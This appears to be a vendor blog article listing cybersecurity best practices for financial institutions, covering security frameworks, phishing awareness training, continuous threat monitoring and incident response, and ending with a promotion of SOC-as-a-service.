The financial services sector has been one of the most heavily targeted industries for years now, and it’s no mystery why. According to Verizon’s 2017 Data Breach Investigations Report, 96 percent of attacks against firms in the industry were financially motivated. Hackers go where the money is.

Credentials represented 71 percent of the compromised data in this sector, as hackers continue digging for the keys to systems they hope will unlock a quick payday. Twelve percent of compromised data was payment data and 9 percent was personal information. (In the cataclysmic Equifax breach, personally identifiable information belonging to about half of the U.S. population was exposed.)

Furthermore, 95 percent of the businesses covered in Verizon’s report had 1,000 or fewer employees, which clearly indicated hackers’ willingness to go after small and medium-sized financial institutions.

To avoid becoming another statistic, all financial institutions should adhere rigidly to these five best practices:

1. Establish a formal security framework

There are currently several core security frameworks to help financial institutions manage cyber risk more effectively. These include:

• The National Institute of Standards and Technology Cybersecurity Framework (NIST): Covers best practices in five core areas of information security – Identify, Protect, Detect, Respond and Recover.
• The Federal Financial Institutions Examination Council Information Technology Examination Handbook: A comprehensive list of security guidelines that cover everything from application protection to end-of-life management to vendor management to the rule of least privilege and beyond.

Companies in the FinServ industry can use the NIST and FFIEC guidelines to start establishing baseline security capabilities that make the compliance processes for GLBA, PCI DSS, SOX, standards easier.

2. Arm your your employees with knowledge

“Knowledge is power in cybersecurity.”

The vast majority of malware proliferates through a series of online social engineering schemes that manipulate unsuspecting users to open the door wide for hackers. One of the most common examples is macro malware, also known as fileless, or zero-footprint malware. These strains are effective at bypassing firewalls since they take advantage of existing applications rather than attempting to sneak a payload through a web filter.

For instance, a user may receive an email from an unknown sender (or worse, from a known contact whose account is compromised) containing a seemingly legitimate spreadsheet or Word document. Upon downloading that attachment, they may be prompted to enable macros, which are legitimate scripts used to run certain tasks. In reality, that macro will issue a command to a remote server to download malware.

The first line of defense before technological solutions take over is employees themselves. All involved in the lines of business must learn how to spot phishing schemes. Attachments without context or vague subject lines, for instance, even when sent from an existing contact, are dead giveaways. Teach these identification techniques and other security best practices (using password managers, logging out of your devices before leaving them unattended, etc.) to employees to significantly curb the risk of user-driven compromise.

Something as simple as a fake “password reset” email can result in a devastating breach. Something as simple as a fake “password reset” email can result in a devastating breach.

3. Perform continuous threat monitoring

The importance of 24/7/365 threat monitoring can be critical, especially in finance.

First and foremost, once hackers worm their way onto your network, they attempt to cover their tracks in order to be persistent. The majority of data breaches are furtive in nature. Hackers sneak in, perhaps by first stealing login credentials through a phishing campaign, and they then attempt to mask their activity using a series of advanced tactics. Once inside, the risk multiplies exponentially as they try to move laterally to other systems with sensitive information. This has potentially drastic consequences for firms in financial services as the next step is to create backdoors through which they can slowly siphon data that can either be used for future attack campaigns or sold on the dark web.

In some cases, hackers will take more direct action. In one of the boldest attacks against a financial institution to date, hackers used the SWIFT banking network in 2016 to wire themselves $81 million after breaching the Bangladesh Central Bank using a series of phishing scams. This incident, and others like it, highlights the significance of real-time threat monitoring. The sooner you detect an indicator of compromise, the more quickly you can take action to prevent harm to your financial institution. And early detection can be the difference between a minor setback and a major nosedive.

4. Devise comprehensive incident response plans

Incident response should never be treated like an ad-hoc process. Assume that you will be breached–because you will. Your IT organization should already have a well-defined methodology and IR playbooks that can be quickly implemented to quarantine, block or eliminate malicious network traffic.

But it’s not just frontline security analysts and incident responders that need clear IR protocols. Dealing with compromise swiftly is a joint, organization-wide effort. Every employee, from the CEO to the summer intern, needs to know the standard operating procedure should they encounter a cyberattack. For example, whose job is it to inform clients if the breach has impacted them? If data has been lost, what should an employee do to try to recover it, or who should they contact? Answering these types of questions ahead of time can abate post-intrusion calamity and pave a smooth path to recovery.

For comprehensive cyber-security, only a fully functioning security operations center (SOC) combines the people, processes and technology needed for a truly effective monitoring, detection and response. Unfortunately, for small to midsize enterprises (SMEs) this isn’t always an in-house option since the technology is expensive and requires a skilled security team. However, with SOC-as-a-service, these companies can affordably attain the threat monitoring and detection they need to stop attacks before they have time to do damage.